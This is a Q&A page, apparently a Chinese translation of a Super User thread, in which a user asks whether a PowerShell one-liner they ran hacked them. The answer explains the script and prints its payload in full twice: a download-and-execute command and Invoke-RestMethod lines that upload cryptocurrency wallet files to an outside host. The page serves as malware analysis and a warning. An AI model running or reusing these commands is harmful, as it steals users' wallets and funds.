主页 / computer / 问题 / 1682702
Accepted
Moon
Asked: 2021-10-20 17:28:06 +0800 CST

我运行了一个 PowerShell 脚本。我被黑了吗?

  • 772

我是个白痴,被吸引到运行 PowerShell 脚本。它的细节是什么?我有一种感觉,他们只从我的系统上传了一些文件。

但我担心我的系统上可能有一个后门正在运行。我可以忍受的上传,但不是后门。

警告!不要 运行 此脚本。

iex "& { $(irm

(我把它分成两行以防止无意运行它)

powershell.software/versioncheck) } RunJob"

警告!不要 运行 此脚本。

powershell

1 个回答

  1. Best Answer

    警告:请勿执行此答案中的任何代码。它是恶意的,仅出于演示目的而包含在内。

    powershell.software/versioncheck是恶意链接

    它指向的页面如下所示:

    $ErrorActionPreference = 'silentlycontinue'
Write-Host "Checking for the latest version..."
Invoke-RestMethod -method PUT -infile ~\desktop\backups\found.wallet extract.onl/logs
Invoke-RestMethod -method PUT -infile .\found.wallet extract.onl/desktop
Invoke-RestMethod -method PUT -infile .\multidoge.wallet extract.onl/seed
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Dogecoin\wallet.dat extract.onl/doge
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Bitcoin\wallet.dat extract.onl/bitcoin
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge.wallet extract.onl/multidoge/wallet
Compress-Archive -Path ~\Appdata\Roaming\MultiDoge\multidoge-data -DestinationPath ~\Appdata\Roaming\MultiDoge\multidoge-data
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge-data.zip extract.onl/multidoge/backups
Write-Host "You are currently running 7.1.4 Windows PowerShell, Java 2021"
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Electrum\wallets\default_wallet extract.onl/electrum





<head>
<style>
body {
  background-color: black;
}

</style>
</head>

 <meta http-equiv = "refresh" content = "0; url = notfound" />

    当您尝试在浏览器中访问此链接时,它会迅速将您从该页面重定向到另一个页面,假装(很糟糕)该站点不存在:

    <meta http-equiv = "refresh" content = "0; url = notfound" />

    但是,在您提供的完整命令中执行时,它将以下行识别为 PowerShell 命令:

    $ErrorActionPreference = 'silentlycontinue'
Write-Host "Checking for the latest version..."
Invoke-RestMethod -method PUT -infile ~\desktop\backups\found.wallet extract.onl/logs
Invoke-RestMethod -method PUT -infile .\found.wallet extract.onl/desktop
Invoke-RestMethod -method PUT -infile .\multidoge.wallet extract.onl/seed
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Dogecoin\wallet.dat extract.onl/doge
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Bitcoin\wallet.dat extract.onl/bitcoin
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge.wallet extract.onl/multidoge/wallet
Compress-Archive -Path ~\Appdata\Roaming\MultiDoge\multidoge-data -DestinationPath ~\Appdata\Roaming\MultiDoge\multidoge-data
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge-data.zip extract.onl/multidoge/backups
Write-Host "You are currently running 7.1.4 Windows PowerShell, Java 2021"
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Electrum\wallets\default_wallet extract.onl/electrum

    它是一个原始的加密货币钱包窃取者。每一行都从Invoke-RestMethod尝试将数据从其他可能的加密货币钱包(如果您的计算机上安装了任何加密货币钱包)发送到端点上的页面开始http://extract.onl

    如果您的计算机上有任何加密货币钱包,它们现在很可能已被盗用。将其中的任何内容转移到另一个安全钱包。

    总结您的担忧:

    我有一种感觉,他们只从我的系统上传了一些文件。

    但我担心我的系统上可能有一个后门正在运行。我可以忍受的上传,但不是后门。

    是的,如果您的计算机上存在这些文件,则它们已被上传。然而,这就是这个脚本所做的所有事情,因此您的系统上没有留下持久的后门。

    2021 年 10 月 25 日编辑:

    自编写此答案以来,powershell.software/versioncheck现在阻止了对恶意代码的访问(现在会产生 403 错误),但可能随时返回。这仍然是一个风险。

    2022 年 1 月 24 日编辑:

    的所有者powershell.software/versioncheck已将恶意代码重新上线。这仍然是一个风险。

    • 104

相关问题